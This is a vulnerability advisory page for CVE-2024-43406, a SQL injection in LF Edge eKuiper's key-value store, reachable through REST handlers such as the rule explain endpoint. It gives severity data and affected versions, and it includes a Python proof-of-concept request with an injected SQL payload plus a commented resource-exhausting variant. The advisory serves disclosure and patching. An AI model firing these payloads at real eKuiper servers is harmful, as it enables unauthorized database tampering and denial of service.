🛡️ CVE-2024-43406 — ekuiper

🟠 CVSS 8.0 — High ⚠️ Exploit Public CWE-89 OSV
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

LF Edge eKuiper has a SQL Injection in sqlKvStore

Summary

A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore.

Details

I will use explainRuleHandler ("/rules/{name}/explain") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.

The SQL injection can happen in the code:

https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93

The code to accept user input is:

https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277

The rule id in the above code can be used to exploit SQL query.

Note that the delete function is also vulnerable:

https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141

PoC

```

import requests

from urllib.parse import quote

# SELECT val FROM 'xxx' WHERE key='%s';

payload = f"""'; ATTACH DATABASE 'test93' AS test93;

CREATE TABLE test93.pwn (dataz text);

INSERT INTO test93.pwn (dataz) VALUES ("sql injection");--"""

#payload = "deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--"

url = f"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain" # explainRuleHandler

res = requests.get(url)

print(res.content)

```

The screenshot shows the malicious SQL query to insert a value:

![image](https://github.com/user-attachments/assets/baf035cc-a561-4909-8d1f-e455e75375cb)

The screenshot shows the breakpoint of executing the query:

![image](https://github.com/user-attachments/assets/b9c29945-a0cc-4271-bdc8-c1bddfda5b6f)

Impact

SQL Injection vulnerability

The reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs low-level privileges on the target. No user interaction is required. Rated impact: confidentiality high, integrity high, availability high.

Weakness class

CVE-2024-43406 is classified as CWE-89: SQL Injection. Untrusted input is concatenated into an SQL statement, letting an attacker change the query and reach data the request should not return.

Affected software

CVE-2024-43406 is recorded against 2 packages.

  • ekuiper (fixed in 1.14.2)
  • github.com/lf-edge/ekuiper

Timeline and source

Published on 20 August 2024 and last revised on 17 June 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from OSV.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Package)
github.com (Web)

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CWE CWE-89
Public Exploit ⚠️ Yes
Source OSV
Published 2024-08-20
Updated 2026-08-12
Modified 2026-06-17

Affected Packages

Software From version Fixed in
ekuiper 1.14.2
github.com/lf-edge/ekuiper

Similar Threats

Exploit Protection

Are you running ekuiper?

CVE-2024-43406 carries CVSS 8.0 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2024-43406 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.